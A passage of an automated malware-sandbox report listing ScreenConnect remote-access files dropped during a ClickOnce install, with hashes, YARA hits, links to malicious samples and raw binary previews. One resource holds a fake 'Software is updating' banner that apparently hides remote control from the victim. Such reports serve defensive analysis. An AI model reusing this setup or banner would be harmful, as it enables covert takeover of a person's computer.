                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.cdf-ms

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4428
                                                                                                                                                                                                                                                        Entropy (8bit):4.0814070596009735
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:pojkeV+Ww8+45u6Or2WQkvFTOd4TyOmBf:OJ1u6lcUOyr
                                                                                                                                                                                                                                                        MD5:A7856DC379F49AAC188D6B5DECA56E9E
                                                                                                                                                                                                                                                        SHA1:377586E4340CEC5D436256FB68AE4706848C97C0
                                                                                                                                                                                                                                                        SHA-256:B27B29CEDDDC91BB57CBA0ACF33BF79727E5CEEDE15E5210F66BA0CF5FC82858
                                                                                                                                                                                                                                                        SHA-512:23CE34A589BF46800F5A770844FD4259A9B9A9C53C299831B382556F42B9E36657A871377E61A8AECCC02D9C2F4E4A849EFE54716294346C620B037E043C2163
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:PcmH.........dr>....,...T.......T...............8...........+........<.g..J.|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........U.............6...................z..w.....[~31.X....[s.T..<....s".I...R....y..&..d......B(...........E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......|...........(...............................(................... ...(...4.......\.......d...(...|...................(...............L...........0...................................................................................................................................................................................................................................................................................................nameScreenConnect.Cl

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.manifest

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1632
                                                                                                                                                                                                                                                        Entropy (8bit):5.092740375848212
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRzgeP0AW+vSkcyMwcbEMwcuMwcVSkcf5bdTo:3FYZ8h9o9gI0AWCHMwTMw3MwGAXTo
                                                                                                                                                                                                                                                        MD5:219DBCD947D7BBDF0BBC78778286B8C7
                                                                                                                                                                                                                                                        SHA1:E95D66F48C130644CE421CBBBFCF3D376FEBAC4E
                                                                                                                                                                                                                                                        SHA-256:C92BB401516771F702CD0986219589CA90E7DE089C8CF4DD825D904985299796
                                                                                                                                                                                                                                                        SHA-512:9E147F80D629AA00C4E0CB8DB708635BA6C14FDE30B8A5574927197352747B43B063060EB4D201C2B4AC984A9F4C84F5F774EB29DE481A0FEE572FB7B0C31F13
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):95520
                                                                                                                                                                                                                                                        Entropy (8bit):6.504144260093153
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Sg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMu7axl:jhbNDxZGXfdHrX7rAc6myJkgoU0HVI
                                                                                                                                                                                                                                                        MD5:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                        SHA1:15886A7D4385D7EC4F7C8837D7218D46E5B3DD9C
                                                                                                                                                                                                                                                        SHA-256:0B2824097ABE3211AAC5FEDA8DC4D300BA51801D9FBED9EB8330B433A66AC001
                                                                                                                                                                                                                                                        SHA-512:B9133EA853AAF6BB2F5EFD7B65A4559701C37D992D8E9CC79BF181CD8CECF0D436077278DDD87725FB5E59BB2962D0FBC111BF0C7E1C760688D01BA4FA4F003E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                        • Filename: xrWUzly94Z.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: EPCo9k8NIn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: X5zNv1VJia.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: AmedVA2n92.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: z7NLXIia8r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: wbxZk3AvuB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: 3ckUhKW8W6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: z7NLXIia8r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: wbxZk3AvuB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: 3ckUhKW8W6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................+.....@.................................p...x....`..P............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):61216
                                                                                                                                                                                                                                                        Entropy (8bit):6.311801757323114
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:EW/+lo6MOc8IoiKWj8Nv8DtyQ4RE+TC6GAhVby97sxd:ELlo6dcclCyQGGn9G
                                                                                                                                                                                                                                                        MD5:C754141304DE3EBAD8ECEEA033356AD6
                                                                                                                                                                                                                                                        SHA1:6AC5D18F1525878FA83E5A93F606AFC58DC7D949
                                                                                                                                                                                                                                                        SHA-256:B1B8A3AD61C1ECED612C442442CC2CF73E2E4B81ACFC8EDFDB3DDEEBAE1E6D78
                                                                                                                                                                                                                                                        SHA-512:81C3B134A2C7C591607ACAC6F9C7881BF0BC194903339534943D65DF49E904BC7FAEEA2A350A4314E28DB2C913C2183C9D3ECF6CA03EB082F5EA461D1E4A6333
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P............"...0.................. ........@.. ....................... .......|....@.....................................O....... ............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsClient.exe.config

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):81696
                                                                                                                                                                                                                                                        Entropy (8bit):5.8611828051677515
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Atygl44gzbJI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7wk7bOxrk:r+kukLd0kv+k
                                                                                                                                                                                                                                                        MD5:66E3A8246447DECC97AB63A3485B8DE4
                                                                                                                                                                                                                                                        SHA1:2630B84AD3328A1E1CAE11CDF1D7CA2AFC5DB607
                                                                                                                                                                                                                                                        SHA-256:04A113517425FA2544367F4D343FB04AEE582E6CF2E387EAA9A92B7303652973
                                                                                                                                                                                                                                                        SHA-512:363BFBD98B5C49CDF7201AA196D1FEA8EAA905EC531E585FB941B246C881390340AB9CA19996564D32A26CADFC46715C48A15A9E2A08E5760F014E65C9220F11
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.X..........."...0..@...........^... ...`....@.. .......................`............@..................................^..O....`.................. )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):548352
                                                                                                                                                                                                                                                        Entropy (8bit):6.045519732283216
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:YtkHq9BVYKH062PQHz0k4NbuI2Tt1QsEaVQQUzxmj8/lmQpnGGlsGdmACEhHkG5Y:YNpZZasEbJ0OnGGlNkuMHCzzdU
                                                                                                                                                                                                                                                        MD5:D0B5084C680C798B5340D2E61CA5E06C
                                                                                                                                                                                                                                                        SHA1:C4F4DE6B77589A8D853F565C99DEF5DBFB230725
                                                                                                                                                                                                                                                        SHA-256:D933498CD929C57AAB0C3AF908E0FE617213DD67C13E39B2A1D68B8F21849A7A
                                                                                                                                                                                                                                                        SHA-512:E14E32D981F4926FE80A4C45D5DFCDCDC3B78DC63556FFBFB4DCE61C2818E6AA2FD5BACC5734970BDE017AC3FDCF0E24FABCC68C1C99C98A84095394E46391B5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...iB............" ..0..V...........p... ........... ....................................@.................................qp..O.......t............................o..8............................................ ............... ..H............text....T... ...V.................. ..`.rsrc...t............X..............@..@.reloc...............\..............@..B.................p......H........B...,..................To........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1721856
                                                                                                                                                                                                                                                        Entropy (8bit):6.638253108372186
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24576:qGPFFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:DPFJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                        MD5:F4E602A8A0FD88FF3FFDAC946C21E567
                                                                                                                                                                                                                                                        SHA1:1B9D9F1581F780485A325A35DCD29A16B213591C
                                                                                                                                                                                                                                                        SHA-256:2AB4FB595844C11F27A54402C37197C96FA8E92FCC5D63B43D4810A4891EFBC7
                                                                                                                                                                                                                                                        SHA-512:6DFFC1EF67CC474FC7DCE358A7E3297EBAB4456B88A3A172F0E4BA65C5EE8DD6F67611296DBC8F478B7A3E2ED714E412A26BEF84D19E1B36AD0754BD693CF00B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..>...........\... ...`....... ...............................o....@.................................?\..O....`..|............................[..8............................................ ............... ..H............text....<... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................s\......H.......H..................0....[........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):600864
                                                                                                                                                                                                                                                        Entropy (8bit):6.181289241696816
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:CQjDnLlwtFNqDJPeQ66ON3nNFcndYYvavXP:Nmt7KLONdFCdYA+P
                                                                                                                                                                                                                                                        MD5:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                        SHA1:F288AE509BAE3A0901B727DEBE2CA3153AB77B72
                                                                                                                                                                                                                                                        SHA-256:054260618E077FADCD155C5F37EF3D5745F914ADFE916AE61E8BAFA47F855839
                                                                                                                                                                                                                                                        SHA-512:DC1BF1331B18D0C0E9092A57575A106DFC71CFAE5F9744D6ECACF1F65C3FF8B635737E6F380E7F166DE96E261E79A3C6459DB9D3C8BB524FB7A92DD940847728
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`...........@.................................5...O.... .................. )...@..........8............................................ ............... ..H............text...X.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................i.......H....... F................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):197120
                                                                                                                                                                                                                                                        Entropy (8bit):6.584712994459805
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:mxGtNaldxI5KY9h12MMusqVFJRJcyzvfquFzDvJXYyB:1tNalc5fr12MbPJY8quFGy
                                                                                                                                                                                                                                                        MD5:4D94014D41DE954AEE952C1B930BA395
                                                                                                                                                                                                                                                        SHA1:35A776D4B569C5367F61A68A577CE92086E682E2
                                                                                                                                                                                                                                                        SHA-256:AD8FC048CE7A61C1AF0428B7B3989163A215A9378417CAC6FBF232D0538405C3
                                                                                                                                                                                                                                                        SHA-512:0ACA355B24FAF86B6C321E88321EFF542F277331745010C3A495AAE6F2F123E518284CB7445F78A83BCE3A61BDFFD1AA3FC082E7DC854218B5D7AF95478414F8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5............" ..0.................. ... ....... .......................`......].....@.................................-...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.en-US.resources

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):359
                                                                                                                                                                                                                                                        Entropy (8bit):4.83753806903797
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:8kVXdyrKDLIP12MUAvvR+oHO8fTG6cAtuRTAlrRF4l10+HwercYn:rHy2DLI4MWoHO8L9cAgRMZRCl1FHcY
                                                                                                                                                                                                                                                        MD5:17702A9E63BED7438F3217D594D6E35C
                                                                                                                                                                                                                                                        SHA1:7C556F344A57D5933A528F8B8CFD0363F15AE0E3
                                                                                                                                                                                                                                                        SHA-256:8BFD7D9E0BAC6BDE538DFBE31E8919933547F30248E747C5B38EB84472DF3701
                                                                                                                                                                                                                                                        SHA-512:642BB2D85ECB653DA779AFFAA4285612BC7EB08383967DB16D9F9CA709F6A46280E6E6C7605E850E5AEC28043828826CA6948982591C310374119785784B303B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_%.......&... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.?....=Software is updating... Please do not turn off your computer!..

